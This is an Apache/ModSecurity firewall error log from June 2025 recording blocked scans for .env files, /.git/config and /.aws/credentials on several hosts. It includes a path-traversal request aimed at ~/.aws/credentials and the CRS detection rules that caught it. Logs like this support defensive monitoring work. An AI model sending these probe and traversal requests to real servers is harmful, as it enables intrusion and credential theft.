[Mon Jun 09 14:24:16.719292 2025] [:error] [pid 3732066] [client 93.123.109.101:47618] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aEbScPapOuZKkaf2c_kw6AAAAAk"]
[Mon Jun 09 14:24:16.719446 2025] [:error] [pid 3732066] [client 93.123.109.101:47618] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aEbScPapOuZKkaf2c_kw6AAAAAk"]
[Thu Jun 12 15:22:02.913778 2025] [:error] [pid 3807652] [client 185.177.72.210:11920] [client 185.177.72.210] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aErUeleo3O6PWDAqcdL9ewAAAA8"]
[Thu Jun 12 15:22:02.914910 2025] [:error] [pid 3807652] [client 185.177.72.210:11920] [client 185.177.72.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aErUeleo3O6PWDAqcdL9ewAAAA8"]
[Thu Jun 12 15:22:02.915079 2025] [:error] [pid 3807652] [client 185.177.72.210:11920] [client 185.177.72.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aErUeleo3O6PWDAqcdL9ewAAAA8"]
[Fri Jun 13 02:36:26.173918 2025] [:error] [pid 3818568] [client 45.148.10.98:34312] [client 45.148.10.98] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEtyivr0iJhQ_YaOeNANAgAAAAk"]
[Fri Jun 13 02:36:26.174407 2025] [:error] [pid 3818568] [client 45.148.10.98:34312] [client 45.148.10.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEtyivr0iJhQ_YaOeNANAgAAAAk"]
[Fri Jun 13 02:36:26.174669 2025] [:error] [pid 3818568] [client 45.148.10.98:34312] [client 45.148.10.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEtyivr0iJhQ_YaOeNANAgAAAAk"]
[Sat Jun 14 16:40:00.195668 2025] [:error] [pid 3842818] [client 185.177.72.144:60614] [client 185.177.72.144] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aE2JwLdQ60EV8plST4c9PQAAAAA"]
[Sat Jun 14 16:40:00.196957 2025] [:error] [pid 3842818] [client 185.177.72.144:60614] [client 185.177.72.144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aE2JwLdQ60EV8plST4c9PQAAAAA"]
[Sat Jun 14 16:40:00.197135 2025] [:error] [pid 3842818] [client 185.177.72.144:60614] [client 185.177.72.144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aE2JwLdQ60EV8plST4c9PQAAAAA"]
[Wed Jun 18 02:38:52.728478 2025] [:error] [pid 3927469] [client 196.251.88.64:46632] [client 196.251.88.64] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFIKnF5fm91CZe_ECLFxwgAAAAA"]
[Wed Jun 18 02:38:52.730252 2025] [:error] [pid 3927469] [client 196.251.88.64:46632] [client 196.251.88.64] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFIKnF5fm91CZe_ECLFxwgAAAAA"]
[Wed Jun 18 02:38:52.730425 2025] [:error] [pid 3927469] [client 196.251.88.64:46632] [client 196.251.88.64] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFIKnF5fm91CZe_ECLFxwgAAAAA"]
[Wed Jun 18 02:46:18.146276 2025] [:error] [pid 3927489] [client 196.251.88.64:49658] [client 196.251.88.64] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFIMWvjW2vkVK469lxQbcAAAAAE"]
[Wed Jun 18 02:46:18.146554 2025] [:error] [pid 3927489] [client 196.251.88.64:49658] [client 196.251.88.64] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFIMWvjW2vkVK469lxQbcAAAAAE"]
[Wed Jun 18 02:46:18.146720 2025] [:error] [pid 3927489] [client 196.251.88.64:49658] [client 196.251.88.64] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aFIMWvjW2vkVK469lxQbcAAAAAE"]
[Wed Jun 18 20:54:40.819768 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aFMLcKD4bWTWTYhGoc0jjwAAAAE"]
[Wed Jun 18 20:54:40.819855 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aFMLcKD4bWTWTYhGoc0jjwAAAAE"]
[Wed Jun 18 20:54:40.819906 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aFMLcKD4bWTWTYhGoc0jjwAAAAE"]
[Wed Jun 18 20:54:40.820661 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aFMLcKD4bWTWTYhGoc0jjwAAAAE"]
[Wed Jun 18 20:54:40.820849 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/pms"] [unique_id "aFMLcKD4bWTWTYhGoc0jjwAAAAE"]
[Wed Jun 18 20:54:42.435842 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aFMLcqD4bWTWTYhGoc0jkQAAAAE"]
[Wed Jun 18 20:54:42.436076 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aFMLcqD4bWTWTYhGoc0jkQAAAAE"]
[Wed Jun 18 20:54:42.436282 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aFMLcqD4bWTWTYhGoc0jkQAAAAE"]
[Wed Jun 18 20:54:42.646553 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aFMLcqD4bWTWTYhGoc0jkgAAAAE"]
[Wed Jun 18 20:54:42.646780 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aFMLcqD4bWTWTYhGoc0jkgAAAAE"]
[Wed Jun 18 20:54:42.646977 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aFMLcqD4bWTWTYhGoc0jkgAAAAE"]
[Wed Jun 18 20:54:42.984915 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aFMLcqD4bWTWTYhGoc0jkwAAAAE"]
[Wed Jun 18 20:54:42.985137 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aFMLcqD4bWTWTYhGoc0jkwAAAAE"]
[Wed Jun 18 20:54:42.985358 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aFMLcqD4bWTWTYhGoc0jkwAAAAE"]
[Wed Jun 18 20:54:44.549192 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aFMLdKD4bWTWTYhGoc0jlQAAAAE"]
[Wed Jun 18 20:54:44.549407 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aFMLdKD4bWTWTYhGoc0jlQAAAAE"]
[Wed Jun 18 20:54:44.549616 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aFMLdKD4bWTWTYhGoc0jlQAAAAE"]
[Wed Jun 18 20:54:44.807819 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aFMLdKD4bWTWTYhGoc0jlgAAAAE"]
[Wed Jun 18 20:54:44.808025 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aFMLdKD4bWTWTYhGoc0jlgAAAAE"]
[Wed Jun 18 20:54:44.808216 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aFMLdKD4bWTWTYhGoc0jlgAAAAE"]
[Wed Jun 18 20:54:45.053762 2025] [authz_core:error] [pid 3929824] [client 56.124.83.181:57576] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Wed Jun 18 20:54:45.308761 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aFMLdaD4bWTWTYhGoc0jmAAAAAE"]
[Wed Jun 18 20:54:45.308978 2025] [:error] [pid 3929824] [client 56.124.83.181:57576] [client 56.124.83.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aFMLdaD4bWTWTYhGoc0jmAAAAAE"]
